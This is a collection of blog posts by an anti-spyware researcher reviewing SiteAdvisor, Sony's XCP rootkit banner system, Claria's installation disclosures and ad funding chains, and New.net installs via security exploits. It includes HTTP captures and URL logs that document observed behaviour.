Deciding Who To Trust

This article is a bit different from most of my site: My other articles generally discuss specific vendors, their practices, and how they cause harm. This article offers a possible solution — from a company that, let me say at the outset, has invited me to join its advisory board. They didn’t ask me to write this; I’m writing on my own. And they don’t control me or what I write. But for those not interested in a commercial service that may help protect users from spyware, please read no further.

Much of the spyware problem results from users visiting sites that turn out to be untrustworthy or simply malevolent. I’m certainly not inclined to blame the victimized users — it’s hardly their fault that sites run security exploits, offer undisclosed advertising software, or show tricky EULAs that are dozens of pages long. But the resulting software ultimately ends up on users’ computers because users browsed to sites that didn’t pan out.

How to fix this problem? In theory, it seems easy enough. First, someone needs to examine popular web sites, to figure out which are untrustworthy. Then users’ computers need to automatically notify them — warn them! — before users reach untrustworthy sites. These aren’t new ideas. Indeed, half a dozen vendors have tried such strategies in the past. But for various reasons, their efforts never solved the problem. (Details below).

This month, a new company is announcing a system to protect users from untrustworthy web sites: SiteAdvisor. They’ve designed a set of robots — automated web crawlers, virtual machines, and databases — that have browsed hundreds of thousands of web sites. They’ve tracked which sites install spyware — what files installed, what registry changes, what network traffic. And they’ve built a browser plug-in that provides automated notification of worrisome sites — handy red balloons when users stray into risky areas, along with annotations on search result pages at leading search engines.

The SiteAdvisor Idea

I’ve long known that the best way to assess a web site’s trustworthiness is to examine and test the site. In general that’s remarkably time-consuming — requiring at least a few minutes of time, of a high-skill human researcher. But a tester is inevitably looking for a few basic characteristics. Does the site offer programs for download? If it does, do those programs come with bundled adware or spyware? In principle this is work better suited to a robot — a system that can perform tests around the clock, with full automation, in massive parallel, at far lower cost than a human staff person. SiteAdvisor has built such robots, and they’re running even as I write this. The results are impressive. See an example report.

Of course automated testing of web sites can find more than just spyware. What about spam? Whenever I see a web form that requests my email address, I always worry: Will the web site send me spam? Or sell my name to spammers? As with spyware, it’s a problem of trust. And it’s a problem SiteAdvisor can investigate. Fill out hundreds of thousands of forms, putting a different email address into each. Wait a few months and see which addresses get spam. Case closed.

To provide users with timely information about who to trust, SiteAdvisor has to put a plug-in into users’ browsers. In general I’m no fan of browser plug-ins; most plug-ins serve marketing companies’ interests (i.e. by showing ads) rather than actually helping users. But at just 92 pixels in width, SiteAdvisor’s plug-in is remarkably unobtrusive. I run it on my main PC, and it shares space otherwise left vacant by the Google Toolbar (the only other browser plug-in I accept). See first screenshot below, showing SiteAdvisor in action.

SiteAdvisor in action, evaluating zango.com.   SiteAdvisor's detailed "dossier" report of entertainmentwallpaper.com -- reporting what downloads it offers (and what software they bundle), as well as links, emails, and other areas of  possible concern.

Of course there’s more to SiteAdvisor than just these pop-up balloons. If a user clicks “More” in a warning balloon, or otherwise searches the SiteAdvisor site, SiteAdvisor gives detailed information about the risks it found. These detailed “dossiers” report what downloads a site offers (and what software they bundle), as well as links to other sites (potentially hostile or tricky), emails (potential spam), and other areas of possible concern. See right image above, and additional screenshots.

My Role in SiteAdvisor – and How Others Can Help

I’ve been excited about SiteAdvisor — about their product, their technology, and (most importantly) their ability to help users with a serious problem — ever since I learned about the company. I’m so impressed that I agreed to join the company’s advisory board. I’m not involved in day-to-day operations, so specific suggestions are best sent to SiteAdvisor staff, not to me. That said, my relationship with SiteAdvisor is likely to be longer and deeper than my typical consulting gigs, reflecting the seriousness of my commitment to SiteAdvisor.

It’s not easy to design robots that automatically rate the web, and despite SiteAdvisor’s best efforts, their initial ratings aren’t quite perfect. With that in mind, they’re running a preview program. Interested readers can browse SiteAdvisor’s ratings and flag anything that seems wrong or incomplete. SiteAdvisor’s system anticipates its own fallibility — it offers numerous areas for users to contribute comments. There’s even space for reviewed web sites to comment on their ratings — for example, to explain why they think they’ve been unfairly criticized.

Why get involved? If you think, as I do, that SiteAdvisor will attract a large group of passionate users, then it’s sensible to help improve the reviews these users receive. Also, SiteAdvisor has produced an incredible dataset, which they’ll be sharing under a Creative Commons license. In the coming months, I’ll be using this data for research; I’m anticipating some exciting articles analyzing how and where users get infected with spyware. Meanwhile, preview participants get access to SiteAdvisor’s fascinating dossiers (example) — a great way to track which programs install which spyware.

SiteAdvisor in Context

As I mentioned above, SiteAdvisor isn’t the first group seeking to improve the web by rating web sites. But SiteAdvisor makes major advances over previous efforts.


An ActiveX installer with a misleading company name, purportedly  "click yes to continue."An ActiveX installer with a misleading company name, purportedly “click yes to continue.”

Consider, for example, the code-signing system associated with ActiveX controls. (See example at right.) Anticipating security problems with ActiveX, Microsoft designed IE so that it only shows an ActiveX installation prompt if the ActiveX package is properly signed by an accredited code-signer like (in this example) VeriSign. VeriSign in turn sets criteria on who can receive these certificates. But despite these checks, the system turns out to be woefully insecure. For one, VeriSign wasn’t always tough in limiting who can get its certs. (The cert at right was issued a company calling itself “click yes to continue,” a highly misleading company name. Additional examples.) In addition, VeriSign’s main requirement is that a company provide a verifiable name. A company’s software may be highly objectionable — pop-up ads, privacy violations, spam zombies, you name it — but if the company gives its true name and pays VeriSign $200 to $600, then they’re likely to receive a certificate. After I criticized VeriSign’s cert-issuing practices this spring, VeriSign tightened its processes somewhat, but its Thawte subsidiary continues to issue certificates to companies that users rightly dislike. And other cert-issuers are even worse.

The ActiveX debacle shows at least three problems that can plague a certification system.

1) Certifying the wrong thing. ActiveX code-signing certifies characteristics of lesser concern to typical users. In particular, ActiveX code-signing it certifies that a vendor is who it says it is, and code-signing certifies that the specified vendor really did develop the program being offered. That’s a nice start, but it’s not what most users are most worried about other. Instead, users reasonably want to know: Is this program safe? Will it hurt my computer? As it turns out, a code-signing certificate says nothing about trustworthiness of the underlying code. But seeing the “verified” statement and VeriSign’s well-respected name, users mistakenly think code-signing means a program is sure to be safe.

2) Dependent on payment. I worry about certification businesses that receive payment from the companies being certified. If VeriSign issues a code-signing certificate, it gets paid $200 to $600. If it denies a cert, it gets $0. So it’s no surprise that lots of certificates get issued. I credit VeriSign’s good intentions, on the whole. But VeriSign staff face some odd and troubling incentives as they try to meet their code-signing financial objectives.

3) Complaints. There’s often no clear procedure for users to complain of improperly-issued certificates. I previously noted that VeriSign lacked a formal complaint and investigation process. After my article, VeriSign established a complaint form. But there are no public records of complaints received, of pending complaints, or of complaint dispositions. VeriSign may be doing a great job of handling complaints and of correcting any errors, but the public has no way to know.

Remarkably, these same problems plague other self-styled trust authorities. TRUSTe‘s main seal, its Web Privacy Seal, largely certifies that a web site has a privacy policy and that the site has agreed to resolve disputes in the way that TRUSTe requires. The policy might be highly objectionable and one-sided, but TRUSTe will still issue its seal. From the perspective of typical users, this is a “certifying the wrong thing” problem: Users expect TRUSTe to tell them that a site’s privacy policy is fair and that users can confidently provide personal information to the site, but in fact the certificate implies no such thing. (Indeed, six months after I revealed Direct Revenue, eZula, Hotbar, and Webhancer as TRUSTe certificate-holders, TRUSTe’s member list says all but eZula are all still members in good standing. In addition, these companies are known not for their web sites but for their advertising software — products TRUSTe’s certificate doesn’t cover at all. So TRUSTe’s certification is especially likely to mislead users seeking to evaluate these vendors.) Furthermore, TRUSTe receives much of its funding from the vendors it certifies, raising the worry of financial incentives to issue undeserved certificates. Finally, when I’ve sent complaints to TRUSTe, I haven’t always felt I received a prompt or appropriate response. So in my view TRUSTe suffers the same three problems I flag for the VeriSign/code-signing system.


TrustWatch‘s search engine and toolbar are superficially similar to SiteAdvisor: Both companies offer toolbars that claim to help users stay safe online. But TrustWatch suffers from the same kinds of mistakes described above. TrustWatch generally endorses a site if it has a certificate from GeoTrust, Entrust, TRUSTe, or HackerSafe. These groups vary in their respective policies, but none of them affirmatively checks for the privacy violations, spyware, spam, or other ill effects that users reasonably worry about. Instead, their focus is on SSL certificates — important for some purposes, but peripheral to today’s biggest security problems. Meanwhile, the TrustWatch endorsers charge for their certs — raising the payment problems flagged above. Predictably, TrustWatch’s system yields poor results. For example, TrustWatch certifies 180solutions and Direct Revenue with its highest “verified secure” rating. That’s an endorsement few security experts would share.

At least one certification system (besides SiteAdvisor) seems immune from the problems described above: Stan JamesOutfoxed provides a non-profit self-organizing assessment of web site trustworthiness, based on recommendations from a web of trusted experts. Because individual users can decide which recommenders to trust, Outfoxed offers the prospect of ratings based on characteristics users actually care about — solving the “wrong thing” problem. Outfoxed doesn’t charge web sites for ratings, and Outfoxed’s relationship-based trust assessments can distribute meaningful feedback to assure rating accuracy. So Outfoxed addresses the problems described above, and I think it reflects a major step forward. That said, as a self-organizing system, Outfoxed needs a critical mass of experts in order to take off. I worry that it might not get there.

Separately, a few security firms have designed automated systems to seek out spyware. See Microsoft’s HoneyMonkeys and Webroot’s Phileas. But these projects only detect exploits. In particular, they don’t identify the social engineering and misleading installations that web users face with increasing regularity.

SiteAdvisor won’t suffer from the three major problems described above. SiteAdvisor tests the specific behaviors most objectionable to typical users — extra pop-up ads, privacy violations, gummed up PCs, and of course spam — and SiteAdvisor doesn’t give a site a green light just because it has an SSL cert or a posted privacy policy. SiteAdvisor won’t issue certifications upon payment of a fee. And in addition to soliciting an abundance of comments, SiteAdvisor promptly and automatically publishes comments for public review. So, though I’ve been critical of other certification systems, I’m truly excited about SiteAdvisor.

Cleaning Up Sony’s Rootkit Mess updated December 17, 2005

Late last month, Windows expert Mark Russinovich revealed Sony installing a rootkit to hide its “XCP” DRM (digital rights management) software as installed on users’ PCs. The DRM software isn’t something a typical user would want; the “rights” it manages are Sony’s rights, i.e. by preventing users from making copies of Sony music, and this protection for Sony comes at the cost of 1%-2% of CPU time (whether or not users are playing a Sony CD). Notably, Sony didn’t disclose its practices in its installer or even in its license agreement. At least as bad, Sony initially provided no uninstall for the rootkit, and when Sony added an uninstaller, the process was needlessly complicated, prone to crashing, and a security risk. See timeline & index, parts 1 and 2.

Having bungled this situation, Sony has recalled affected CDs and announced an exchange program to swap customers’ affected CDs for XCP-free replacements. For savvy consumers who have followed this story, the exchange looks straightforward. But what about ordinary users, who don’t read the technology press and aren’t likely to learn their rights?

As it turns out, there’s a clear solution: A self-updating messaging system already built into Sony’s XCP player. Every time a user plays a XCP-affected CD, the XCP player checks in with Sony’s server. As Russinovich explained, usually Sony’s server sends back a null response. But with small adjustments on Sony’s end — just changing the output of a single script on a Sony web server — the XCP player can automatically inform users of the software improperly installed on their hard drives, and of their resulting rights and choices.

Sony’s Messaging System; A Demonstration Message

The Sony messaging system works as follows: Whenever a user plays an affected XCP CD, and whenever a user browses within certain sections of the player, the player sends a message to Sony’s connected.sonymusic.com server. A typical outbound message is shown below. A “uId” parameter (yellow) marks the CD being played and the specific section of the player in use.

GET /toc/Connect?type=redirect&uId=1171 HTTP/1.1
Accept: application/*, audio/*, image/*, message/*, model/*, multipart/*, text/*, video/*
User Agent: SecureNet Xtra
Host: connected.sonymusic.com
Connection: Keep Alive
Cache Control: no cache

Sony’s web server typically replies with a reference to a “nobanner.xml” file (green).

HTTP/1.1 302 Moved Temporarily
Set Cookie: ARPT=JKXVXZS64.14.39.161CKMJU; path=/
Date: Sat, 12 Nov 2005 18:36:49 GMT
Server: Apache/1.3.27 (Unix) mod_ssl/2.8.14 OpenSSL/0.9.7d
Location: http://www.sonymusic.com/access/banners/nobanner.xml
Keep Alive: timeout=10
Connection: Keep Alive
Transfer Encoding: chunked
Content Type: text/plain
<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor=”#FFFFFF”>
<p>This document you requested has moved temporarily.</p>
<p>It’s now at <a href=”http://www.sonymusic.com/access/banners/nobanner.xml“>http://www.sonymusic.com/access/banners/nobanner.xml</a>.</p>
</body></html>

In place of this “nobanner” response, what if Sony’s connected server instead replied by sending a reference to a XML file that included relevant, timely disclosures? Using the HOSTS file on a test PC, I caused my test PC to think the connected.sonymusic.com server was at an IP address I controlled (rather than on a real Sony server). I then wrote a replacement /toc/Connect?… script that sent back a reference to an XML file I wrote, rather than the ordinary reference to Sony’s nobanner.xml file. Finally, I posted an XML banner configuration file. Notice my inclusion of a banner image (blue) and a hyperlink (red).

<?xml version=”1.0″ encoding=”UTF-8″ ?>
<rotatingbanner>
<banner src=”http://www.benedelman.org/sony/image1.jpg” href=”http://cp.sonybmg.com/xcp/” time=”4000″ />
</rotatingbanner>

In my test environment, Sony’s XCP player automatically retrieved my XML file, then retrieved the banner and showed it within the large banner box at the bottom of the player. Clicking the banner opened a browser window to the URL specified in the HREF parameter.

A notification banner shown in my Sony XCP Player, demonstrating the feasibility of using the banner system to notify users of the software installed on their computers.A notification banner shown in my Sony XCP Player, demonstrating the feasibility of using the banner system to notify users of the software installed on their computers.

For a very few artists, Sony already uses the notification system to provide updates to the XCP player’s information screens. Fortunately, the banner system explicitly anticipates placing multiple pieces of information in a single banner space. Notice the “rotatingbanner” and “time” constructs in the XML banner file above. If the <banner> tag is repeated, the XCP player automatically rotates between the specified images.

Implications and Discussion

Sony’s recall of affected CDs is a sensible start in undoing the harm and ill will XCP has caused. But for the recall to make a meaningful difference — in actually helping ordinary users, not just in improving Sony’s PR standing — Sony needs to spread the word widely.

Unlike Amazon (which already emailed users who bought an affected CD), Sony does not know the names or addresses of affected customers. But Sony’s existing banner messaging system gives Sony an easy, cost-effective way to reach them. Sony should implement the method described above. Via these banners, Sony can assure that as many affected consumers as possible have timely, authoritative information about what has been done to their computers and about how Sony offers to make them whole.

What I propose is not an auto-updater as that term is generally used. A “real” auto-updater downloads and installs executable program code onto a user’s computer. In contrast, my demonstration downloads only data — a single XML configuration file and a single graphic image. The difference has substantial implications for computer security and user control: Downloading and running executable code risks a substantial intrusion onto users’ PCs, for lack of any technology-enforced limit to what the auto-updater can do. In contrast, merely updating graphics entails no clear harms to computer security or reliability.

Sony’s initial inclusion of self-updating message screens entails clear privacy consequences — transmissions to Sony servers that report users’ IP addresses, playing habits, and CDs on hand. But these transmissions occur whether Sony sends a null “nobanner” answer or sends a useful banner with information users urgently need. Under the circumstances, Sony might as well put the notification system to use.

Sony Takes My Suggestion       (This section added on December 17, 2005.)

Sony has accepted my suggestion of using XCP’s existing banner system to notify users about the XCP software. Today, upon inserting an affected Sony XCP CD, I received the banner shown below. Clicking the banner led me to http://cp.sonybmg.com/worldwide and onwards to instructions to update XCP (including removing the XCP rootkit) or to remove XCP altogether.

An actual banner shown in my Sony XCP Player on December 17, 2005.An actual banner shown in my Sony XCP Player on December 17, 2005.

What Claria Doesn’t Disclose (Any More)

Now that Claria no longer comes bundled with powerhouse distributors Kazaa and Grokster, and now that Claria has even terminated its fake-user-interface banner ads, one might reasonably wonder: How does Claria get onto users’ PCs? Last month I showed an example of Claria soliciting installations via banner ads served through other vendors’ spyware (which in turn had become installed without consent). But even Claria’s ordinary installations still fail to tell users what users reasonably need to know in order to make an informed choice. In particular, Claria’s current installations omit prominent mention of the word “pop-up” — the key word users need to read in order to understand what Claria is offering, and to decide whether to agree.

Claria’s Current Installation Procedure

Claria’s installations often begin with an innocuous-looking popup or popunder like the image below. These ads don’t mention Claria by name, don’t mention pop-ups or privacy consequences, and don’t mention any material adverse effects whatsoever. So it’s no surprise that users respond favorably to these offers.

Claria's initial installation solicitation, showing screensavers and mentioning that they are "free," but not mentioning that they come from Claria, that they bundle pop-up ads, or that they track where users go online.

Clicking one of Claria’s “free screensaver” ads yields a screen like that shown below. Users are specifically encouraged to click “yes.” Once a user presses “yes,” the user has no further opportunity to cancel installation of Claria’s software.

Claria's second installation screen.  Clicking "yes" once  installs Claria software immediately, with no further opportunity to cancel.

It’s well-known that users hate pop-up ads. But, tellingly, Claria currently fails to use the word “pop-up” anywhere in its on-screen disclosures. Claria calls its advertising “GAIN-branded ads,” conveniently omitting the one word — “pop-up” — that best and most concisely describes its ads. Interestingly, Claria’s omission of the word “pop-up” reflects a change from its prior installation practice. Compare the two screenshots below, showing the prompt I observed in April 2005 (left) versus Claria’s current installation prompt (right). Notice inclusion of the word “pop-up” in the left prompt only.

Claria's April 2005 installation prompt, including the word "pop-up."   Claria's current ActiveX installation prompt -- omitting the word "pop-up."
April 2005 November 2005

Claria’s Compliance with Applicable FTC Rules

In an August 2004 interview, Claria chief privacy officer Reed Freeman set out Claria’s disclosure duties. “Material terms, as defined by the FTC, are those that are likely to affect a consumer’s conduct with respect to a product or service,” Freeman explained, adding that existing law requires that “material terms have to be disclosed prior to a consumer [installing software].” Let’s accept Freeman’s statement of this rule. Surely the presence of extra pop-ups would deter a consumer from accepting Claria’s offer. If so, under Freeman’s own statement of existing law, Claria must disclose that it will show pop-ups.

Claria may try to defend its installations by noting that the word “pop-ups” appears in the “Final Step to download your free screensaver” screen, above. But in the default arrangement of windows, as they appeared on my ordinary SVGA screen, the “p” and “o” of “pop-up” were hidden behind the ActiveX popup, such that only the letters “p-ups” were visible. Hidden text cannot satisfy a FTC disclosure requirement. So this covered disclosure does not provide the kind of information that FTC rules require.

Claria may try to defend its installations by noting that it subsequently shows a “software utility user information” screen. Scrolling through this screen will ultimately lead to information about Claria’s pop-ups. But the document is lengthy, and typical users will not see the section that discusses pop-ups specifically. Furthermore, the document is shown only after users press Yes to install Claria; by the time users see this document, they can’t cancel the Claria installation. So this subsequent text cannot satisfy the requirement that disclosure occur “prior to a consumer installing software” (emphasis added).

Claria may try to defend its installations by noting its plan to move away from popups, in favor of ads embedded within partner web sites. But the Claria software I tested — the result of the installation shown and discussed above — still showed pop-ups, including a popup delivered mere minutes after I finished installation. These pop-ups are a material effect, under Freeman’s own statement of FTC rules. So whatever Claria’s future plans, Claria’s current pop-ups should be disclosed as such.

Some advertisers apparently stand ready to defend their use of advertising systems like Claria’s, and Claria counts as customers some of the country’s largest advertisers. But advertisers should demand better. If advertisers are prepared to show their ads in pop-ups, let them first obtain user consent — not vague consent to “ads,” but specific consent to “pop-ups.” Until Claria improves its installation procedures to provide this information, users who run Claria software can’t reasonably be claimed to know what they were getting into.

Claria Shows Ads Through Exploit-Delivered Popups

Seeking to clean up its image, Claria has tried to distance itself from competing “adware” vendors — hiring a privacy officer, filing comments with the FTC, even setting up an anti-spyware site. It’s no surprise that Claria wants little to do with other vendors in this space: Other vendors’ entirely nonconsensual installations (1, 2, 3) are a magnet for criticism. These vendors even undercut Claria’s pricing — showing ads for as little as $0.015 per display, where Claria demands a minimum payment of $25,000 per ad campaign.

But despite Claria’s dislike of “spyware” vendors who install advertising software without any notion of user consent, Claria funds and supports such vendors in at least two distinct ways. First, Claria pays spyware vendors to show Claria’s own ads through their popups — thereby recruiting more users to install Claria’s advertising software. Second, Claria buys traffic from spyware vendors and uses this traffic to show ads for Claria’s advertiser clients — including merchants as reputable as Amazon.

So even as Claria reforms its own practices — improving its installation methods and scaling back its controversial popups — Claria is buying ads from others whose practices are far inferior.

Soliciting Installations through Spyware-Delivered Popups

At bottom-left, a Claria screensaver ad promoted by a Venus123 popup. The Venus123 popup was opened by spyware, which had become installed on a test PC without consent. The Venus123 popup is so large that it entirely covers the test PC's Start Menu and Taskbar.At bottom-left, a Claria screensaver ad shown within a Venus123 popup. The Venus123 popup was opened by ContextPlus, which had become installed on a test PC via a security exploit, without my consent. The Venus123 popup is so large that it entirely covers the test PC’s Start Menu and Taskbar.

    Claria    
(promoting installation of Claria “adware”)
money viewers
Zedo.com
(an ad network)
money viewers
02320.net
money viewers
Yieldmanager.com
(an ad network)
money viewers
Venus123.com
money viewers
ContextPlus
(spyware installed without consent)

The money trail — how funds flow from Claria to ad networks to spyware vendors (here, ContextPlus).

I have posted a series of pieces critiquing Claria’s installation methods — showing installations at kids sites, in tricky bundles, with substantively unreasonable license agreements. I haven’t recently seen the fake-user-interface Claria ads I wrote about previously — ads which encouraged users to install Claria by mimicking distinctive Windows dialog box formatting. But I am seeing Claria’s ads embedded within popups delivered by spyware — that is, delivered by advertising software installed on my test PC without my consent.

Consider the screenshot at right, showing the venus123.com site with a Claria screensaver ad at bottom-left. This venus123 ad was delivered to my test PC via ContextPlus spyware, which had become installed without my consent. ContextPlus sent traffic to clickandtrack.net which sent traffic to venus123.com. Then venus123.com embedded an ad from Yieldmanager.com, which in turn send traffic to 02320.net, which embedded an ad from Zedo.com, which finally sent the traffic on to Claria’s belnk.com server.

This ContextPlus-Claria ad display reflects an unusually lengthy series of relationships — summarized in the diagram at right. But the net effect is that Claria makes payments that ultimately flow back to ContextPlus — thereby funding spyware installed without consent. A partial URL log follows below, and I also retained a full packet log.

http://adchannel.contextplus.net/services/…
http://hits.clickandtrack.net/cgi-bin/hit?…
http://www.Venus123.com/homepage.precision…
http://ad.yieldmanager.com/imp?z=0&i=2578&…
http://ad.yieldmanager.com/iframe3?AAAAAAQ…
http://adchannel.02320.net/services/AdChan…
http://c5.zedo.com/jsc/c5/ff2.html?n=350;c…
http://c5.zedo.com/bar/v12-500/c5/jsc/ifra…
http://c4.zedo.com/ads2/d/2077/172/350/355…
http://c4.zedo.com//ads2/k/83990/2077/172/…
http://dist.belnk.com/4/placement/1461/?h=…

A Claria installation obtained through this ad may or may not be “consensual.” To reach a conclusion, we’d have to look at what follows when users click the ad — what they’re told about the advertising, privacy, and other relevant effects of installing Claria’s software. (Perhaps I’ll give these ads a close reading in the future, as I previously did for Claria’s fake-user-interface banner ads at kids sites.) But whether or not users ultimately consent to install Claria’s software, it’s troubling to see Claria using its purchasing power to support spyware installed without user consent.

Showing Advertisers’ BehaviorLink Ads through Spyware-Delivered Popups

An Amazon ad served through Claria BehaviorLink. The ad appears within Savings-card.com, a site which was opened in a popup by KVM Media, which had become installed on my test PC via a security exploit, without my consent.An Amazon ad served through Claria BehaviorLink within a popup from Savings-card.com. The Savings-card.com popup was opened by KVM Media, which had become installed on my test PC via a security exploit, without my consent.

Amazon
(and other BehaviorLink advertisers)
money viewers
Claria BehaviorLink
money viewers
Savings-Card.com
(and other sites buying traffic from spyware vendors)
money viewers
KVM Media
(spyware installed without consent)

The money trail — how funds flow from advertisers (here, Amazon) to spyware vendors, via Claria’s BehaviorLink service.

Claria’s funding of spyware (installed without consent) extends beyond Claria’s methods of obtaining new users for its software. Claria also purchases spyware-originated traffic on behalf of its advertiser customers.

In February 2005, Claria announced its new BehaviorLink advertising network. Unlike the controversial pop-ups of Claria’s GAIN — which have brought litigation from web publishers unhappy to see their sites covered by competitors’ popups — BehaviorLink will show ads within publishers’ sites, paying those publishers a share of Claria’s revenue. Viewed in the most favorable light, BehaviorLink would fund free software users want and would help support the sites users request — a winning offer for both users and web sites, Claria claims.

Is the truth as rosy as Claria’s promises? On some level it’s hard to know: Claria’s BehaviorLink says the service is in a “pilot,” and so far we’ve heard little from participating advertisers and publishers. Perhaps it’s too soon to say how well BehaviorLink will work.

But in my initial examination of BehaviorLink traffic, I see serious cause for concern. In particular, I have found that Claria is buying BehaviorLink ad inventory from web sites that receive traffic directly from some of the most notorious spyware, including spyware installed on users’ computers without notice or consent.

Consider the example at right. Savings-card.com buys traffic from KVM Media, which I have repeatedly observed install without notice or consent. So as users browse the web, KVM opens popups of Savings-card.com. But Savings-card.com, which in turns redirects users to Claria’s BehaviorLink. BehaviorLink them shows an ad from one of its partners. The example below at right shows an Amazon ad placed through BehaviorLink, arriving in exactly this way. See also a screenshot of the result of activating the View-Source menu command in the Savings-card popup. Below is a partial URL log showing traffic leading to the ad and (in the final entry) the result of clicking on the ad.

http://www.icannnews.com/cgi-bin/PopupV3?ID=…
http://www.savings-card.com/normal/yyy99.html
http://dist.belnk.com/4/placement/1968/
http://ath.belnk.com/placement/?cb=6747118&did=269085&pid=1968&mint128=343…
http://art.ath.belnk.com/4/creative/42514.1/content42514-0.html?at2=2&imp=…
http://www.amazon.com/exec/obidos/redirect?link_code=ure&camp=1789&tag=ce-…

Note that this popup appeared on a PC without BehaviorLink (or any other Claria software) installed. BehaviorLink’s web servers selected the Amazon ad randomly or on the basis of my other browsing on this test PC.

Claria’s Spyware-Delivered Advertising in Context

Claria’s own comments with the FTC concede that “spyware” is “illegal” under existing law to the extent that such software “is installed [on a consumer’s computer] without the consent of the consumer.” I agree. So Claria must be disheartened to find its ads and its clients’ ads shown through precisely this concededly-illegal software. I doubt that Claria intended to buy spyware-delivered advertising traffic. But by buying the cheapest available advertising space, Claria invited this result. Indeed, Claria’s BehaviorLink business model is premised on buying low-quality ads. Claria’s Scott Eagle told the New York Times in February: “We’ll take ad inventory that costs 50 or 75 cents, buy it in bulk, and turn it into gold by targeting $6 or $15 precision ads there. We’ll be the alchemists.” (cached copy)

To date, BehaviorLink has received strikingly positive press coverage. The media has largely accepted Claria’s promises — advertising software installed because users actually want it (not because they were tricked into accepting it, see above), and ads shown within high-quality partner web sites (not spyware-delivered popups). On the strength of these promises, it seems that Claria has been able to recruit remarkably high-quality advertisers like Amazon — advertisers who would not want to be associated with Claria’s traditional pop-ups.

My observations lead me to challenge these favorable assumptions about BehaviorLink. I still doubt whether users will install Claria’s software if Claria fully discloses the consequences of doing so (especially the effects on privacy). And the KVM Media example above shows BehaviorLink’s dependence on the quality of sites showing BehaviorLink ads. If Claria buys traffic from spyware vendors, directly or indirectly, then BehaviorLink ads get placed in spyware-delivered popups, not in web sites users actually want to visit. Then BehaviorLink ends up funding spyware, not funding the web sites users request.

Avoiding spyware-sourced traffic will require exceptional diligence on Claria’s part — inevitably driving up costs and reducing the profit margins Scott Eagle touted to the Times. I already have several more examples of BehaviorLink ads delivered in popups from exploit-installed spyware, and I’ll be watching for more.

Of course Claria is not the only network facing the problem of spyware-delivered ads. In May I examined more than 88,000 ads then served by 180solutions, finding that literally thousands flowed to or through major ad networks such as aQuantive’s AtlasDMT. These bogus syndication relationships remain widespread, as to popups served by 180solutions and numerous others. I’ve written a series of crawlers and robots to help me assess these problems — identifying which ad networks are involved, and identifying specific ad URLs that are affiliated with spyware vendors. But it’s a remarkably deep problem: Ads are passed from one ad network to another in ways that tend to confuse even my smartest crawlers. And ad networks have little incentive to investigate or stop these practices: They can only lose revenues by prohibiting such ads, so most networks seem to prefer to look the other way.

For now, spyware-delivered popups continue to promote many of the world’s leading merchants — including, thanks to Claria’s BehaviorLink, Amazon.com.

Video: New.net Installed through Security Holes

My last few posts have all covered spyware revenue sources (e.g. major advertisers, pay-per-click ads, and affiliate networks). But I always come back to poor installation practices as the core of the spyware problem. And nonconsensual installations continue to benefit surprisingly large vendors. Today’s focus: New.net.

Introduction to New.net

New.net provides a proprietary domain name system that allows it to sell nonstandard domain names to advertisers. These proprietary domains are resolved through New.net’s own servers, so these domains are accessible only to users whose ISPs have chosen to support New.net (few have), or to users with New.net’s client software installed on their PCs.

Despite major funding from Idealab, New.net hasn’t made a lot of friends. When New.net first announced its navigation DNS experts criticized New.net for breaking the namespace: In a New.net world, not all computers can reach all domain names. Internetnews called New.net an “end-run around ICANN,” and Internet Society staff worried of New.net causing “address collisions” by creating new domains that already exist elsewhere.

Facing so much criticism, New.net understandably sought to improve its image. But rather than changing its unpopular practices, New.net instead tried to silence its critics. In 2003, New.net sued Lavasoft, claiming false advertising and trade libel when Lavasoft detected New.net’s software and offered users an easy way to remove it. This wasn’t a clear win for New.net: Some of its claims were dismissed under anti-SLAPP rules, and in January 2005 New.net voluntarily dismissed its pending appeals. Then again, Lavasoft’s August 2004 change log reports removing signatures for New.net — suggesting that Lavasoft changed its classification of New.net to avoid further litigation. My Threats Against Spyware Critics table also reports New.net threats against CounterExploitation.

New.net’s Installation Practices — And an Example Nonconsensual Installation

A partial listing of programs installed via the Pacimedia exploit. A partial listing of programs installed via the Pacimedia exploit.

The Pacimedia exploit's first screen. Notice no disclosure of specific programs to be installed.
The Pacimedia exploit’s first screen. Notice no disclosure of specific programs to be installed. Notice no terms or conditions actually provided. Installation proceeds if a user presses “close this window” — without requiring that the user affirmatively indicate consent.

Another misleading New.net install -- disclosed via a one-word on-screen description ("New.net") without any explanation of function, purpose, or effect. Finding the New.net license agreement requires scrolling past 60+ pages of other vendors' licenses in the narrow box at right. Another misleading New.net install — disclosed via a one-word on-screen description (“New.net”) without any explanation of function, purpose, or effect. Finding the New.net license agreement requires scrolling past 60+ pages of other vendors’ licenses in the narrow box at right.

New.net finds itself little liked by experts on Internet infrastructure and security. But where are users in this mess? I’ve never spoken with a user who actually wanted New.net, but I’ve looked at plenty of massively-infected computers with New.net installed. So I’ve long suspected nonconsensual, improper, or overly aggressive installations of New.net software.

My suspicions have recently been borne out, because I have repeatedly observed New.net installed via security hole exploits. See this video, made on October 2 in my testing lab. From 0:00 to 0:55, I browse an ordinary web site, 4w-wrestling.com. At 1:07, my computer receives a security exploit — code from Pacimedia syndicated into 4w-wrestling via the Yieldmanager.com ad network. Nine minutes later, Pacimedia installed New.net onto my test machine. See video at 10:30-10:45. See also the top screenshot at right, showing the New.net folder (among others) newly added to my Program Files listing.

Did the Pacimedia installer get user consent to install New.net? Absolutely not. The Pacimedia exploit did show a screen (second image at right), in which it described software “available to be installed.” But nowhere did Pacimedia disclose what programs would be installed; Pacimedia called the software “a free browser enhancement” but gave no names of specific programs or functions. Pacimedia didn’t even link to a separate license, listing, or other document to explain what programs would be installed. Instead, Pacimedia’s installer oddly says users “agree to the terms and conditions stated here” — but neither states nor links to any terms or conditions.

As it turns out, unchecking the mysterious unlabeled checkbox would have prevented the installation of Pacimedia and its bundled programs. But a user cannot be said to have “agreed” to receive New.net (or other software) merely by failing to uncheck a box. And pressing a button labeled “close this window” does not grant consent to install numerous advertising programs.

Of course this isn’t New.net’s only sneaky installation. This spring I looked at eDonkey, which encourages users to install New.net via a pre-checked checkbox, giving New.net’s name and icon, but offering no description of New.net’s effects. Even if a user locates the New.net license — by scrolling through 60+ on-screen pages of other vendors’ licenses — the New.net license still doesn’t explain what New.net does or why a user might (or might not) want it. Such a user cannot reasonably be claimed to have “agreed” to run New.net software.

I’ve also seen New.net in big bundles with other P2P programs, screensavers, and similar. I retain detailed evidence on file. See also Eric Howes’ analysis of New.net as installed by the Good Luck Bear desktop theme — again lacking any explanation of what New.net does.

